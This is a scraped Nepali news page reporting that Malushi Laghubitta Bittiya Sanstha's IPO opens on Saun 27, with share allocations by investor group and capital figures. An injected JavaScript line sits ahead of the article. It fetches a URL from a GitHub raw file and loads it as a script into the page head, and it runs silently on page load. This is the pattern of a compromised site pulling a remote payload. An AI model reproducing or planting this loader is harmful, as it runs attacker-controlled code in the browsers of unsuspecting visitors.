;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मालुषी लघुवित्त वित्तीय संस्था लिमिटेडको IPO साउन २७ बाट खुल्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मालुषी लघुवित्त वित्तीय संस्था लिमिटेडको IPO साउन २७ बाट खुल्ने
Breaking News

मालुषी लघुवित्त वित्तीय संस्था लिमिटेडको IPO साउन २७ बाट खुल्ने

१२ साउन , काठमान्डौ | यहि साउन २७ गतेदेखि मालुषी लघुवित्त वित्तीय  संस्था लिमिटेडको आइपिओ बिक्रि गर्ने भएको छ |

यस कम्पनीले ३ लाख ९२ हजार ७५० कित्ता आइपिओ निस्कासन गर्न लागेको हो | कुल मध्ये 5 हजार ४६९ कित्ता लघुवित्तीयको कर्मचारी २३ हजार ६८८ कित्ता सामुहिक लगानी कोष र ३ लाख ६८ हजार ५३३ कित्ता सर्वसाधारणको लागि निस्कासन गरिने छ |

आइपिओं साउन २७ देखि ३१ सम्म आवेदन गर्न सक्नेछन उक्त समयसम्म आइपिओं बिक्रि नभए भदै ९ गते सम्म दिन पाइनेछ | लघुवित्तीय आइपिओ बिक्रि प्रबन्धमा नेपाल एसबी आइ मर्चेन्ट बैकिङ्ग लिमिटेड रहेको छ |

कम्पनीको चुक्ता पुर्जी अहिले ७ करोड रहेको छ | आइपिओ बाडफाड पछी पुजी १० करोड ९३ लाख पुग्ने छ |

फेसबुक प्रतिक्रियाहरु